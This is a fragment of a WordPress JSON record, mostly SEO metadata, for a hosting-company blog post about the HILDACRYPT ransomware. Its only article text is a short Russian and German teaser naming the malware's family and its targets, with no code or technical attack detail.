\u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda [&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-52277","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.10 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.10\" \/>\n\t\t<meta property=\"og:locale\" content=\"de_DE\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-11-04T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T10:59:57+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47HILDACRYPT: Neue Ransomware greift Backup-Systeme und Antivirenl\u00f6sungen an | ProHoster","description":"Hallo, Habr! Wieder einmal berichten wir \u00fcber frische Versionen von Malware aus der Ransomware-Kategorie. HILDACRYPT ist eine neue Ransomware, die zur im August 2019 entdeckten Hilda-Familie geh\u00f6rt, benannt nach einem Zeichentrickfilm des Streaming-Dienstes Netflix, der zur Verbreitung der Software verwendet wurde. Heute besch\u00e4ftigen wir uns mit den technischen Merkmalen dieses aktualisierten Ransomware-Virus. In der ersten Version der Hilda-Ransomware","canonical_url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"de_DE","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster","og:description":"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware. HILDACRYPT \u2014 \u044d\u0442\u043e \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u0432 \u0430\u0432\u0433\u0443\u0441\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u0441\u0435\u043c\u0435\u0439\u0441\u0442\u0432\u0430 Hilda, \u043d\u0430\u0437\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432 \u0447\u0435\u0441\u0442\u044c \u043c\u0443\u043b\u044c\u0442\u0444\u0438\u043b\u044c\u043c\u0430 \u0441\u0442\u0440\u0438\u043c\u0438\u043d\u0433\u043e\u0432\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Netflix, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u041f\u041e. \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u043c\u044b \u0437\u043d\u0430\u043a\u043e\u043c\u0438\u043c\u0441\u044f \u0441 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e\u0441\u0442\u044f\u043c\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u044d\u0442\u043e\u0433\u043e \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u0438\u0440\u0443\u0441\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044f. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Hilda","og:url":"https:\/\/prohoster.info\/de\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-11-04T21:00:00+00:00","article:modified_time":"2020-02-18T10:59:57+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"52277","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-24 03:06:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 17:13:20","updated":"2026-01-24 03:06:20"},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/52277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/comments?post=52277"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/posts\/52277\/revisions"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/media?parent=52277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/categories?post=52277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/de\/wp-json\/wp\/v2\/tags?post=52277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}